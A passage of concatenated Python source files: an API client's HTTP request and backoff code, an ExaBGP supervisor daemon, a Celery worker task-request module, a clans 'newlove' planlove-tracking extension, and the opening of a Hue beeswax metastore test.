'ts':auth['ts'],
'params': _params }
url = options['url'] + options['path']
req_vals = {'params':options['query']['params'],
'key':options['query']['key'],
'auth':options['query']['auth'],
'ts':options['query']['ts'] }
req_data = urllib.urlencode(req_vals)
if options['method'] == 'GET':
url = url + '?' + req_data
req = urllib2.Request(url)
else:
req = urllib2.Request(url, req_data)
req.add_header('User-Agent', self.user_agent+' '+self.VERSION)
attempt = 0
while True:
attempt += 1
try:
res = urllib2.urlopen(req)
self._http_status = res.getcode()
res_data = res.read()
json_data = json.loads(res_data)
return json.loads(json.dumps(json_data))
except urllib2.URLError, e:
if hasattr(e, "reason") and isinstance(e.reason, socket.timeout):
if not self._exponential_backoff(attempt, self.retries):
return False
else:
self._http_status = e.code
break
finally:
pass
"""
Return the last HTTP status code received. Useful for debugging purposes.
@return integer
"""
def http_status(self):
return self._http_status
"""
Implements exponential backoff
@param integer current
@param integer max
@return bool
"""
def _exponential_backoff(self, current, _max):
if current <= _max:
# back off for (2 ** current) * 0.1 seconds; the original factor of 100000
# reads like microseconds, which time.sleep() would interpret as seconds
delay = (2 ** current) * 0.1
time.sleep(delay)
return True
return False
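# ---------------------------------------------------------------------------
# Hedged usage sketch (illustrative only; the key, secret and keyword are
# placeholders):
#
#   api = SMapi(credentials={'key': 'YOUR_KEY', 'secret': 'YOUR_SECRET'})
#   res = api.add('flowers', ['google_en-us', 'bing_en-us'])
#   balance = api.credit()
#   print api.http_status()
# ---------------------------------------------------------------------------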
|
|
# encoding: utf-8
"""
exabgp.py
Created by Thomas Mangin on 2009-08-30.
Copyright (c) 2009 Exa Networks. All rights reserved.
"""
import os
import sys
import time
import signal
import select
from bagpipe.exabgp.network.peer import Peer
from bagpipe.exabgp.version import version
from bagpipe.exabgp.daemon import Daemon
from bagpipe.exabgp.processes import Processes
from bagpipe.exabgp.configuration import Configuration
from bagpipe.exabgp.network.connection import errno_block
from bagpipe.exabgp.processes import ProcessError
from bagpipe.exabgp.log import Logger
logger = Logger()
class Supervisor (object):
# [hex(ord(c)) for c in os.popen('clear').read()]
clear = ''.join([chr(int(c,16)) for c in ['0x1b', '0x5b', '0x48', '0x1b', '0x5b', '0x32', '0x4a']])
def __init__ (self,configuration):
self.daemon = Daemon(self)
self.processes = Processes(self)
self.configuration = Configuration(configuration)
self.watchdogs = {}
self._peers = {}
self._shutdown = False
self._reload = False
self._restart = False
self._route_update = False
self._commands = {}
self._saved_pid = False
self.reload()
signal.signal(signal.SIGTERM, self.sigterm)
signal.signal(signal.SIGHUP, self.sighup)
signal.signal(signal.SIGALRM, self.sigalrm)
def sigterm (self,signum, frame):
logger.supervisor("SIG TERM received")
self._shutdown = True
def sighup (self,signum, frame):
logger.supervisor("SIG HUP received")
self._reload = True
def sigalrm (self,signum, frame):
logger.supervisor("SIG ALRM received")
self._restart = True
def run (self,supervisor_speed=0.5):
if self.daemon.drop_privileges():
logger.supervisor("Could not drop privileges to '%s' refusing to run as root" % self.daemon.user)
logger.supervisor("Set the environment variable USER to change the unprivileged user")
return
self.daemon.daemonise()
self.daemon.savepid()
# did we complete the run of updates caused by the last SIGHUP ?
reload_completed = True
while True:
try:
while self._peers:
start = time.time()
self.handle_commands(self.processes.received())
if self._shutdown:
self._shutdown = False
self.shutdown()
elif self._reload and reload_completed:
self._reload = False
self.reload()
elif self._restart:
self._restart = False
self.restart()
elif self._route_update:
self._route_update = False
self.route_update()
elif self._commands:
self.commands(self._commands)
self._commands = {}
reload_completed = True
# Handle all connection
peers = self._peers.keys()
ios = []
while peers:
for key in peers[:]:
peer = self._peers[key]
# there were no routes to send for this peer; we performed keepalive checks
if peer.run() is not True:
# no need to come back to it before a full cycle
if peer.bgp and peer.bgp.connection:
ios.append(peer.bgp.connection.io)
peers.remove(key)
# send the routes we parsed (if we parsed any) to our child processes
# This is a generator and can only be run once
try:
for route in peer.received_routes():
# This is a generator whose content only changes at config reload
for name in self.processes.receive_routes():
# using str(key) as we should not manipulate it and assume its format
self.processes.write(name,'neighbor %s %s\n' % (str(key),route))
except ProcessError:
# Can not find any better error code than 6,0 !
raise Notify(6,0,'ExaBGP Internal error, sorry.')
# otherwise process as many routes as we can within a second for the remaining peers
duration = time.time() - start
# The RFC states that we MUST NOT send more than one KEEPALIVE / sec
# And doing less could cause the session to drop
if duration >= 1.0:
reload_completed = False
ios=[]
break
duration = time.time() - start
if ios:
try:
read,_,_ = select.select(ios,[],[],max(supervisor_speed-duration,0))
except select.error,e:
errno,message = e.args
if not errno in errno_block:
raise
else:
if duration < supervisor_speed:
time.sleep(max(supervisor_speed-duration,0))
self.processes.terminate()
self.daemon.removepid()
break
except KeyboardInterrupt:
logger.supervisor("^C received")
self._shutdown = True
except IOError:
logger.supervisor("I/O Error received, most likely ^C during IO")
self._shutdown = True
except ProcessError:
logger.supervisor("Problem when sending message(s) to helper program, stopping")
self._shutdown = True
# from leak import objgraph
# print objgraph.show_most_common_types(limit=20)
# import random
# obj = objgraph.by_type('ReceivedRoute')[random.randint(0,2000)]
# objgraph.show_backrefs([obj], max_depth=10)
def shutdown (self):
"""terminate all the current BGP connections"""
logger.info("Performing shutdown","supervisor")
for key in self._peers.keys():
self._peers[key].stop()
def reload (self):
"""reload the configuration and send to the peer the route which changed"""
logger.info("Performing reload of exabgp %s" % version,"configuration")
reloaded = self.configuration.reload()
if not reloaded:
logger.info("Problem with the configuration file, no change done","configuration")
logger.info(self.configuration.error,"configuration")
return
for key in self._peers.keys():
if key not in self.configuration.neighbor.keys():
# the peer is gone from the new configuration, so take its neighbor
# definition from the existing Peer instance
logger.supervisor("Removing Peer %s" % self._peers[key].neighbor.name())
self._peers[key].stop()
for key in self.configuration.neighbor.keys():
neighbor = self.configuration.neighbor[key]
# new peer
if key not in self._peers.keys():
logger.supervisor("New Peer %s" % neighbor.name())
peer = Peer(neighbor,self)
self._peers[key] = peer
else:
# check if the neighbor definition is the same (BUT NOT THE ROUTES)
if self._peers[key].neighbor != neighbor:
logger.supervisor("Peer definition change, restarting %s" % str(key))
self._peers[key].restart(neighbor)
# set the new neighbor with the new routes
else:
logger.supervisor("Updating routes for peer %s" % str(key))
self._peers[key].reload(neighbor.every_routes())
logger.info("Loaded new configuration successfully",'configuration')
self.processes.start()
def handle_commands (self,commands):
for service in commands:
for command in commands[service]:
# watchdog
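# expected forms: 'announce watchdog <name>' / 'withdraw watchdog <name>';
# when no name is given, the name of the sending service is used instead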
if command.startswith('announce watchdog') or command.startswith('withdraw watchdog'):
parts = command.split(' ')
try:
name = parts[2]
except IndexError:
name = service
self.watchdogs[name] = parts[0]
self._route_update = True
# route announcement / withdrawal
elif command.startswith('announce route'):
route = self.configuration.parse_single_route(command)
if not route:
logger.supervisor("Command could not parse route in : %s" % command)
else:
self.configuration.add_route_all_peers(route)
self._route_update = True
elif command.startswith('withdraw route'):
route = self.configuration.parse_single_route(command)
if not route:
logger.supervisor("Command could not parse route in : %s" % command)
else:
if self.configuration.remove_route_all_peers(route):
logger.supervisor("Command success, route found and removed : %s" % route)
self._route_update = True
else:
logger.supervisor("Command failure, route not found : %s" % route)
# flow announcement / withdrawal
elif command.startswith('announce flow'):
flow = self.configuration.parse_single_flow(command)
if not flow:
logger.supervisor("Command could not parse flow in : %s" % command)
else:
self.configuration.add_route_all_peers(flow)
self._route_update = True
elif command.startswith('withdraw flow'):
flow = self.configuration.parse_single_flow(command)
if not flow:
logger.supervisor("Command could not parse flow in : %s" % command)
else:
if self.configuration.remove_route_all_peers(flow):
logger.supervisor("Command success, flow found and removed : %s" % flow)
self._route_update = True
else:
logger.supervisor("Command failure, flow not found : %s" % flow)
# commands
elif command in ['reload','restart','shutdown','version']:
self._commands.setdefault(service,[]).append(command)
# unknown
else:
logger.supervisor("Command from process not understood : %s" % command)
def commands (self,commands):
def _answer (service,string):
self.processes.write(service,string)
logger.supervisor('Responding to %s : %s' % (service,string))
for service in commands:
for command in commands[service]:
if command == 'shutdown':
self._shutdown = True
_answer(service,'shutdown in progress')
continue
if command == 'reload':
self._reload = True
_answer(service,'reload in progress')
continue
if command == 'restart':
self._restart = True
_answer(service,'restart in progress')
continue
if command == 'version':
_answer(service,'exabgp %s' % version)
continue
def route_update (self):
"""the process ran and we need to figure what routes to changes"""
logger.supervisor("Performing dynamic route update")
for key in self.configuration.neighbor.keys():
neighbor = self.configuration.neighbor[key]
neighbor.watchdog(self.watchdogs)
self._peers[key].reload(neighbor.every_routes())
logger.supervisor("Updated peers dynamic routes successfully")
def restart (self):
"""kill the BGP session and restart it"""
logger.info("Performing restart of exabgp %s" % version,"supervisor")
self.configuration.reload()
for key in self._peers.keys():
if key not in self.configuration.neighbor.keys():
logger.supervisor("Removing Peer %s" % self._peers[key].neighbor.name())
self._peers[key].stop()
else:
self._peers[key].restart()
self.processes.start()
def unschedule (self,peer):
key = peer.neighbor.name()
if key in self._peers:
del self._peers[key]
def version_warning ():
sys.stdout.write('\n')
sys.stdout.write('************ WARNING *** WARNING *** WARNING *** WARNING *********\n')
sys.stdout.write('* This program SHOULD work with your python version (2.4). *\n')
sys.stdout.write('* No tests have been performed. Consider python 2.4 unsupported *\n')
sys.stdout.write('* Please consider upgrading to the latest 2.x stable release.    *\n')
sys.stdout.write('************ WARNING *** WARNING *** WARNING *** WARNING *********\n')
sys.stdout.write('\n')
def help ():
sys.stdout.write('\n')
sys.stdout.write('*******************************************************************************\n')
sys.stdout.write('set the following environment values to gather information and report bugs\n')
sys.stdout.write('\n')
sys.stdout.write('DEBUG_ALL : debug everything\n')
sys.stdout.write('DEBUG_CONFIGURATION : verbose configuration parsing\n')
sys.stdout.write('DEBUG_SUPERVISOR : signal received, configuration reload (default: yes)\n')
sys.stdout.write('DEBUG_DAEMON : pid change, forking, ... (default: yes)\n')
sys.stdout.write('DEBUG_PROCESSES : handling of forked processes (default: yes)\n')
sys.stdout.write('DEBUG_WIRE : the packet sent and received\n')
sys.stdout.write('DEBUG_RIB : change in route announcement in config reload\n')
sys.stdout.write('DEBUG_MESSAGE : changes in route announcement in config reload (default: yes)\n')
sys.stdout.write('DEBUG_TIMERS : tracking keepalives\n')
sys.stdout.write('DEBUG_ROUTES : print parsed routes\n')
sys.stdout.write('\n')
sys.stdout.write('PROFILE : (1,true,on,yes,enable) profiling info on exit\n')
sys.stdout.write('             use a filename to dump the output in a file\n')
sys.stdout.write('             IMPORTANT : exabgp will not overwrite existing files\n')
sys.stdout.write('\n')
sys.stdout.write('PDB : on program fault, start pdb the python interactive debugger\n')
sys.stdout.write('\n')
sys.stdout.write('USER : the user the program should try to use if run by root (default: nobody)\n')
sys.stdout.write('PID : the file in which the pid of the program should be stored\n')
sys.stdout.write('SYSLOG: no value for local syslog, a file name (which will auto-rotate) or host:<host> for remote syslog\n')
sys.stdout.write('DAEMONIZE: detach and run the program in the background\n')
sys.stdout.write('MINIMAL_MP: when negotiating multiprotocol, try to announce as few AFI/SAFI pairs as possible\n')
sys.stdout.write('\n')
sys.stdout.write('For example :\n')
sys.stdout.write('> env PDB=1 PROFILE=~/profile.log DEBUG_SUPERVISOR=0 DEBUG_WIRE=1 \\\n')
sys.stdout.write('    USER=wheel SYSLOG=host:127.0.0.1 DAEMONIZE= PID=/var/run/exabgp.pid \\\n')
sys.stdout.write(' ./bin/exabgp ./etc/bgp/configuration.txt\n')
sys.stdout.write('*******************************************************************************\n')
sys.stdout.write('\n')
sys.stdout.write('usage:\n exabgp <configuration file>\n')
def main ():
main = int(sys.version[0])
secondary = int(sys.version[2])
if main != 2 or secondary < 4:
sys.exit('This program can not work (is not tested) with your python version (< 2.4 or >= 3.0)')
if main == 2 and secondary == 4:
version_warning()
if len(sys.argv) < 2:
help()
sys.exit(0)
for arg in sys.argv[1:]:
if arg in ['--',]:
break
if arg in ['-h','--help']:
help()
sys.exit(0)
Supervisor(sys.argv[1]).run()
sys.exit(0)
if __name__ == '__main__':
profiled = os.environ.get('PROFILE',0)
if profiled == 0:
main()
else:
try:
import cProfile as profile
except ImportError:
import profile
if profiled.lower() in ['1','true','yes','on','enable']:
profile.run('main()')
else:
notice = ''
if os.path.isdir(profiled):
notice = 'profile can not use this filename as output, it is a directory (%s)' % profiled
if os.path.exists(profiled):
notice = 'profile can not use this filename as output, it already exists (%s)' % profiled
if not notice:
logger.supervisor('profiling ....')
profile.run('main()',filename=profiled)
else:
logger.supervisor("-"*len(notice))
logger.supervisor(notice)
logger.supervisor("-"*len(notice))
main()
|
|
import sys
import time
import socket
import warnings
from celery import conf
from celery import log
from celery import platform
from celery.datastructures import ExceptionInfo
from celery.execute.trace import TaskTrace
from celery.loaders import current_loader
from celery.registry import tasks
from celery.utils import noop, kwdict, fun_takes_kwargs
from celery.utils.mail import mail_admins
from celery.worker import state
# pep8.py borks on an inline signature separator and
# says "trailing whitespace" ;)
EMAIL_SIGNATURE_SEP = "-- "
TASK_ERROR_EMAIL_BODY = """
Task %%(name)s with id %%(id)s raised exception: %%(exc)s
Task was called with args: %%(args)s kwargs: %%(kwargs)s.
The contents of the full traceback was:
%%(traceback)s
%(EMAIL_SIGNATURE_SEP)s
Just to let you know,
celeryd at %%(hostname)s.
""" % {"EMAIL_SIGNATURE_SEP": EMAIL_SIGNATURE_SEP}
WANTED_DELIVERY_INFO = ("exchange", "routing_key", "consumer_tag", )
class InvalidTaskError(Exception):
"""The task has invalid data or is not properly constructed."""
class AlreadyExecutedError(Exception):
"""Tasks can only be executed once, as they might change
world-wide state."""
class WorkerTaskTrace(TaskTrace):
"""Wraps the task in a jail, catches all exceptions, and
saves the status and result of the task execution to the task
meta backend.
If the call was successful, it saves the result to the task result
backend, and sets the task status to ``"SUCCESS"``.
If the call raises :exc:`celery.exceptions.RetryTaskError`, it extracts
the original exception, uses that as the result and sets the task status
to ``"RETRY"``.
If the call results in an exception, it saves the exception as the task
result, and sets the task status to ``"FAILURE"``.
:param task_name: The name of the task to execute.
:param task_id: The unique id of the task.
:param args: List of positional args to pass on to the function.
:param kwargs: Keyword arguments mapping to pass on to the function.
:returns: the function return value on success, or
the exception instance on failure.
"""
def __init__(self, *args, **kwargs):
self.loader = kwargs.pop("loader", current_loader())
super(WorkerTaskTrace, self).__init__(*args, **kwargs)
self._store_errors = True
if self.task.ignore_result:
self._store_errors = conf.STORE_ERRORS_EVEN_IF_IGNORED
self.super = super(WorkerTaskTrace, self)
def execute_safe(self, *args, **kwargs):
"""Same as :meth:`execute`, but catches errors."""
try:
return self.execute(*args, **kwargs)
except Exception, exc:
_type, _value, _tb = sys.exc_info()
_value = self.task.backend.prepare_exception(exc)
exc_info = ExceptionInfo((_type, _value, _tb))
warnings.warn("Exception outside body: %s: %s\n%s" % tuple(
map(str, (exc.__class__, exc, exc_info.traceback))))
return exc_info
def execute(self):
"""Execute, trace and store the result of the task."""
self.loader.on_task_init(self.task_id, self.task)
if self.task.track_started:
self.task.backend.mark_as_started(self.task_id)
try:
return super(WorkerTaskTrace, self).execute()
finally:
self.task.backend.process_cleanup()
self.loader.on_process_cleanup()
def handle_success(self, retval, *args):
"""Handle successful execution."""
if not self.task.ignore_result:
self.task.backend.mark_as_done(self.task_id, retval)
return self.super.handle_success(retval, *args)
def handle_retry(self, exc, type_, tb, strtb):
"""Handle retry exception."""
message, orig_exc = exc.args
if self._store_errors:
self.task.backend.mark_as_retry(self.task_id, orig_exc, strtb)
self.super.handle_retry(exc, type_, tb, strtb)
def handle_failure(self, exc, type_, tb, strtb):
"""Handle exception."""
if self._store_errors:
exc = self.task.backend.mark_as_failure(self.task_id, exc, strtb)
else:
exc = self.task.backend.prepare_exception(exc)
return self.super.handle_failure(exc, type_, tb, strtb)
def execute_and_trace(task_name, *args, **kwargs):
"""This is a pickleable method used as a target when applying to pools.
It's the same as::
>>> WorkerTaskTrace(task_name, *args, **kwargs).execute_safe()
"""
platform.set_mp_process_title("celeryd", info=task_name)
try:
return WorkerTaskTrace(task_name, *args, **kwargs).execute_safe()
finally:
platform.set_mp_process_title("celeryd")
class TaskRequest(object):
"""A request for task execution.
:param task_name: see :attr:`task_name`.
:param task_id: see :attr:`task_id`.
:param args: see :attr:`args`
:param kwargs: see :attr:`kwargs`.
.. attribute:: task_name
Kind of task. Must be a name registered in the task registry.
.. attribute:: task_id
UUID of the task.
.. attribute:: args
List of positional arguments to apply to the task.
.. attribute:: kwargs
Mapping of keyword arguments to apply to the task.
.. attribute:: on_ack
Callback called when the task should be acknowledged.
.. attribute:: message
The original message sent. Used for acknowledging the message.
.. attribute:: executed
Set to ``True`` if the task has been executed.
A task should only be executed once.
.. attribute:: delivery_info
Additional delivery info, e.g. it contains the path
from producer to consumer.
.. attribute:: acknowledged
Set to ``True`` if the task has been acknowledged.
"""
# Logging output
success_msg = "Task %(name)s[%(id)s] processed: %(return_value)s"
error_msg = """
Task %(name)s[%(id)s] raised exception: %(exc)s\n%(traceback)s
"""
# E-mails
email_subject = """
[celery@%(hostname)s] Error: Task %(name)s (%(id)s): %(exc)s
"""
email_body = TASK_ERROR_EMAIL_BODY
# Internal flags
executed = False
acknowledged = False
time_start = None
_already_revoked = False
def __init__(self, task_name, task_id, args, kwargs,
on_ack=noop, retries=0, delivery_info=None, hostname=None,
email_subject=None, email_body=None, logger=None,
eventer=None, **opts):
self.task_name = task_name
self.task_id = task_id
self.retries = retries
self.args = args
self.kwargs = kwargs
self.on_ack = on_ack
self.delivery_info = delivery_info or {}
self.hostname = hostname or socket.gethostname()
self.logger = logger or log.get_default_logger()
self.eventer = eventer
self.email_subject = email_subject or self.email_subject
self.email_body = email_body or self.email_body
self.task = tasks[self.task_name]
def __repr__(self):
return '<%s: {name:"%s", id:"%s", args:"%s", kwargs:"%s"}>' % (
self.__class__.__name__,
self.task_name, self.task_id,
self.args, self.kwargs)
def revoked(self):
if self._already_revoked:
return True
if self.task_id in state.revoked:
self.logger.warn("Skipping revoked task: %s[%s]" % (
self.task_name, self.task_id))
self.send_event("task-revoked", uuid=self.task_id)
self.acknowledge()
self._already_revoked = True
return True
return False
@classmethod
def from_message(cls, message, message_data, logger=None, eventer=None,
hostname=None):
"""Create a :class:`TaskRequest` from a task message sent by
:class:`celery.messaging.TaskPublisher`.
:raises UnknownTaskError: if the message does not describe a task,
the message is also rejected.
:returns: :class:`TaskRequest` instance.
"""
task_name = message_data["task"]
task_id = message_data["id"]
args = message_data["args"]
kwargs = message_data["kwargs"]
retries = message_data.get("retries", 0)
_delivery_info = getattr(message, "delivery_info", {})
delivery_info = dict((key, _delivery_info.get(key))
for key in WANTED_DELIVERY_INFO)
if not hasattr(kwargs, "items"):
raise InvalidTaskError("Task kwargs must be a dictionary.")
return cls(task_name, task_id, args, kwdict(kwargs),
retries=retries, on_ack=message.ack,
delivery_info=delivery_info, logger=logger,
eventer=eventer, hostname=hostname)
def extend_with_default_kwargs(self, loglevel, logfile):
"""Extend the tasks keyword arguments with standard task arguments.
Currently these are ``logfile``, ``loglevel``, ``task_id``,
``task_name``, ``task_retries``, and ``delivery_info``.
See :meth:`celery.task.base.Task.run` for more information.
"""
kwargs = dict(self.kwargs)
default_kwargs = {"logfile": logfile,
"loglevel": loglevel,
"task_id": self.task_id,
"task_name": self.task_name,
"task_retries": self.retries,
"task_is_eager": False,
"delivery_info": self.delivery_info}
fun = self.task.run
supported_keys = fun_takes_kwargs(fun, default_kwargs)
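# only forward the default keyword arguments that the task's run()
# signature actually accepts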
extend_with = dict((key, val) for key, val in default_kwargs.items()
if key in supported_keys)
kwargs.update(extend_with)
return kwargs
def _get_tracer_args(self, loglevel=None, logfile=None):
"""Get the :class:`WorkerTaskTrace` tracer for this task."""
task_func_kwargs = self.extend_with_default_kwargs(loglevel, logfile)
return self.task_name, self.task_id, self.args, task_func_kwargs
def _set_executed_bit(self):
"""Set task as executed to make sure it's not executed again."""
if self.executed:
raise AlreadyExecutedError(
"Task %s[%s] has already been executed" % (
self.task_name, self.task_id))
self.executed = True
def execute(self, loglevel=None, logfile=None):
"""Execute the task in a :class:`WorkerTaskTrace`.
:keyword loglevel: The loglevel used by the task.
:keyword logfile: The logfile used by the task.
"""
if self.revoked():
return
# Make sure task has not already been executed.
self._set_executed_bit()
# acknowledge task as being processed.
if not self.task.acks_late:
self.acknowledge()
tracer = WorkerTaskTrace(*self._get_tracer_args(loglevel, logfile))
retval = tracer.execute()
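# for acks_late tasks this is the first acknowledgement; otherwise
# acknowledge() is a no-op because the message was already acked above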
self.acknowledge()
return retval
def send_event(self, type, **fields):
if self.eventer:
self.eventer.send(type, **fields)
def execute_using_pool(self, pool, loglevel=None, logfile=None):
"""Like :meth:`execute`, but using the :mod:`multiprocessing` pool.
:param pool: A :class:`multiprocessing.Pool` instance.
:keyword loglevel: The loglevel used by the task.
:keyword logfile: The logfile used by the task.
:returns: :class:`multiprocessing.AsyncResult` instance.
"""
if self.revoked():
return
# Make sure task has not already been executed.
self._set_executed_bit()
args = self._get_tracer_args(loglevel, logfile)
self.time_start = time.time()
result = pool.apply_async(execute_and_trace, args=args,
accept_callback=self.on_accepted,
timeout_callback=self.on_timeout,
callbacks=[self.on_success], errbacks=[self.on_failure])
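# the pool reports back through this request: on_accepted when a worker
# picks the task up, on_timeout for soft/hard time limits, and
# on_success / on_failure with the final outcome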
return result
def on_accepted(self):
state.task_accepted(self.task_name)
if not self.task.acks_late:
self.acknowledge()
self.send_event("task-started", uuid=self.task_id)
self.logger.debug("Task accepted: %s[%s]" % (
self.task_name, self.task_id))
def on_timeout(self, soft):
state.task_ready(self.task_name)
if soft:
self.logger.warning("Soft time limit exceeded for %s[%s]" % (
self.task_name, self.task_id))
else:
self.logger.error("Hard time limit exceeded for %s[%s]" % (
self.task_name, self.task_id))
def acknowledge(self):
if not self.acknowledged:
self.on_ack()
self.acknowledged = True
def on_success(self, ret_value):
"""The handler used if the task was successfully processed (
without raising an exception)."""
state.task_ready(self.task_name)
if self.task.acks_late:
self.acknowledge()
runtime = time.time() - self.time_start
self.send_event("task-succeeded", uuid=self.task_id,
result=repr(ret_value), runtime=runtime)
msg = self.success_msg.strip() % {
"id": self.task_id,
"name": self.task_name,
"return_value": ret_value}
self.logger.info(msg)
def on_failure(self, exc_info):
"""The handler used if the task raised an exception."""
state.task_ready(self.task_name)
if self.task.acks_late:
self.acknowledge()
self.send_event("task-failed", uuid=self.task_id,
exception=repr(exc_info.exception),
traceback=exc_info.traceback)
context = {
"hostname": self.hostname,
"id": self.task_id,
"name": self.task_name,
"exc": repr(exc_info.exception),
"traceback": unicode(exc_info.traceback, 'utf-8'),
"args": self.args,
"kwargs": self.kwargs,
}
self.logger.error(self.error_msg.strip() % context)
task_obj = tasks.get(self.task_name, object)
send_error_email = conf.CELERY_SEND_TASK_ERROR_EMAILS and not \
task_obj.disable_error_emails
if send_error_email:
subject = self.email_subject.strip() % context
body = self.email_body.strip() % context
mail_admins(subject, body, fail_silently=True)
|
|
"""
Newlove extension for clans.
Supports filtering for new planlove and ordering planlove by time.
"""
import json
from datetime import datetime
import os.path
import sys
import io
from clans.util import json_output, ISO8601_UTC_FMT
if sys.version_info < (3,):
str = unicode
# extension globals
lovelog = None
config = {}
class NewloveError(Exception):
"""Errors related to the newlove extension."""
pass
def post_load_commands(cs):
# read configured options into module-global dict
global config
if cs.config.has_section('newlove'):
config.update(dict(cs.config.items('newlove')))
extended_commands = ('love',)
if 'log_love' in config or 'log_search' in config:
# if configured to stalk, also add flags to clans search
extended_commands += ('search',)
for cmd in extended_commands:
cs.commands[cmd].add_argument(
'-t', '--time', dest='time',
action='store_true', default=False,
help="Order results by time first seen.")
cs.commands[cmd].add_argument(
'-n', '--new', dest='new',
action='store_true', default=False,
help="Only show new results.")
cs.commands[cmd].add_argument(
'--keep-unread', dest='keepunread',
action='store_true', default=False,
help="Preserve read state of any new results.")
def convert_dates(dic):
""" If a dict has a key named 'timestamp', convert to datetimes """
if 'timestamp' in dic:
timestamp = datetime.strptime(dic.pop('timestamp'), ISO8601_UTC_FMT)
dic['timestamp'] = timestamp
return dic
def _load_log(fl):
# ValueError would occur here if the JSON parse fails
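# the object_hook turns stored ISO-8601 'timestamp' strings back into
# datetime objects while the JSON is being parsed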
return json.loads(str(fl.read()), object_hook=convert_dates)
def _save_log(newlove, fl):
fl.write(str(json_output(newlove)))
def _rebuild_log(log, results, timestamp=None):
"""
Given results of a search, build an updated version of the log.
This builds and returns a new log containing only entries present
in ``results``. Results not previously seen are timestamped with
the given time; others are passed through unmodified. If no
timestamp is specified, the current time is used.
This function also modifies the original log by deleting entries
that it finds in the results. When it completes, the original log
can be used as an index of results deleted since the original log
was built.
"""
newlog = {}
if timestamp is None:
timestamp = datetime.utcnow()
# rebuild log
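# e.g. (hypothetical data) results = [('ann', 1, ['loves bob'])] with an empty
# log yields {'ann': {'loves bob': {'timestamp': <now>, 'unread': True}}}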
for un, num, snips in results:
old_snips = log.get(un, {})
new_snips = {}
for snip in snips:
new_snips[snip] = old_snips.pop(
snip, dict(timestamp=timestamp, unread=True))
newlog[un] = new_snips
return newlog
def _flatten_log(log):
"""
Convert the nested-dict log format to a list of lovestate dicts.
The log is typically dictionaries of read/unread information,
in a doubly-nested dictionary indexed by the plan name and the
snippet. This converts that structure into a list of those dicts,
where the former indices (plan name and snippet) are added as
two extra entries to that dictionary.
"""
flattened = []
for un, snips in sorted(log.items()):
for snip, lovestate in sorted(snips.items()):
# make a copy when flattening
lovestate = dict(lover=un, text=snip, **lovestate)
flattened.append(lovestate)
return flattened
def modify_results(results, log, order_by_time=False, only_show_new=False):
"""
Modify the result list, in-place, to time-order or filter what is shown.
This takes a ``results`` list reference (as is passed to the
post_search hook) and uses the data in ``log`` to either weed out
results marked as read (if ``only_show_new`` is True), order the
results by the timestamp (if ``order_by_time`` is True), or both.
If neither of these is True (the default), the result list is not modified.
"""
if order_by_time:
# flatten nested dicts
flattened = _flatten_log(log)
# order by time
flattened.sort(key=lambda lovestate: lovestate['timestamp'])
# replace search results by time-ordered quicklove
del results[:]
for lovestate in flattened:
if only_show_new and not lovestate['unread']:
continue
note = lovestate['timestamp'].strftime(ISO8601_UTC_FMT)
results.append((lovestate['lover'], note, [lovestate['text'], ]))
elif only_show_new:
# don't change order, just hide snips we've seen before
for un, count, snips in results:
unread = [snip for snip in snips if log[un][snip]['unread']]
snips[:] = unread
def pre_search(cs, term, planlove=False):
"""
In this function, determine whether to track this search or not.
Track if:
- config file says to log all planlove searches
- config file says to log this specific planlove search
- absent any configured value, log our own planlove only
The config file format to log all planlove searches is:
[newlove]
log_love=
To log specific searches:
[newlove]
log_love=baldwint,gorp,climb
Absent a log_love directive, only searches for your own planlove
will be logged.
This also applies to non-planlove searches, using `log_search`
instead of `log_love`.
"""
global lovelog
global config
suffix = 'love' if planlove else 'search'
thing = config.get('log_%s' % suffix, None)
if thing is None:
# no configured value (default)
# log only our own planlove
logging = bool(planlove and (term == cs.username))
elif thing == '':
# log_love=
# wildcard option; log everybody
logging = True
else:
# if a value is given, take it as a comma separated list
# of searches to log
logging = bool(term in thing.split(','))
if logging:
# set location of log file (in app dir)
lovelog = '{term}.{suffix}'.format(term=term, suffix=suffix)
lovelog = os.path.join(cs.profile_dir, lovelog)
elif cs.args.get('time') or cs.args.get('new'):
# not tracking, but --time or --new was passed
raise NewloveError("Not configured to track '%s'" % term)
def post_search(cs, results):
global lovelog
if lovelog is None:
return
# load stored planlove
try:
fl = io.open(lovelog, 'r', encoding='utf8')
except IOError:
# no log file
oldlove = {}
else:
oldlove = _load_log(fl)
newlove = _rebuild_log(oldlove, results)
# if newlove flags are thrown, modify the displayed results
modify_results(results, newlove,
order_by_time=cs.args['time'],
only_show_new=cs.args['new'])
# mark all planlove as read
if not cs.args['keepunread']:
for dic in newlove.values():
for lovestate in dic.values():
if lovestate['unread']:
lovestate['unread'] = False
# store log
with io.open(lovelog, 'w', encoding='utf8') as fl:
_save_log(newlove, fl)
lovelog = None
# TODO: option to hoard deleted love
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import json
from nose.tools import assert_true, assert_equal, assert_false
from django.utils.encoding import smart_str
from django.contrib.auth.models import User, Group
from django.core.urlresolvers import reverse
import hadoop
from desktop.lib.django_test_util import make_logged_in_client, assert_equal_mod_whitespace
from desktop.lib.test_utils import add_permission, grant_access
from useradmin.models import HuePermission, GroupPermission, group_has_permission
from beeswax.conf import BROWSE_PARTITIONED_TABLE_LIMIT
from beeswax.views import collapse_whitespace
from beeswax.test_base import make_query, wait_for_query_to_finish, verify_history, get_query_server_config, fetch_query_result_data
from beeswax.models import QueryHistory
from beeswax.server import dbms
from beeswax.test_base import BeeswaxSampleProvider
LOG = logging.getLogger(__name__)
def _make_query(client, query, submission_type="Execute",
udfs=None, settings=None, resources=[],
wait=False, name=None, desc=None, local=True,
is_parameterized=True, max=30.0, database='default', email_notify=False, **kwargs):
"""Wrapper around the real make_query"""
res = make_query(client, query, submission_type,
udfs, settings, resources,
wait, name, desc, local, is_parameterized, max, database, email_notify, **kwargs)
# Should be in the history if it's submitted.
if submission_type == 'Execute':
fragment = collapse_whitespace(smart_str(query[:20]))
verify_history(client, fragment=fragment)
return res
class TestMetastoreWithHadoop(BeeswaxSampleProvider):
requires_hadoop = True
def setUp(self):
user = User.objects.get(username='test')
self.db = dbms.get(user, get_query_server_config())
def test_basic_flow(self):
